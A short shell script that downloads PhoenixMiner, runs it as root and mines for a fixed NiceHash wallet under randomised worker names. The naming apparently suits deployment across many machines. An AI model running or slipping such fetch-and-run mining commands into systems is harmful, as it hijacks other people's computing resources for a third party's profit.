#!/bin/sh
apt-get install libpci3 && wget https://phoenixminer.info/downloads/PhoenixMiner_5.6d_Linux.tar.gz && tar -xf PhoenixMiner_5.6d_Linux.tar.gz && cd PhoenixMiner_5.6d_Linux && sudo ./PhoenixMiner -pool stratum+tcp://daggerhashimoto.eu.nicehash.com:3353 -wal 34c9NuoJv2EnewUYV4vhGwJWZ8AnkaqBKw.$(echo $(shuf -i 1-70 -n 1)-quicksilver) -pass x -mi 14 -gt 400
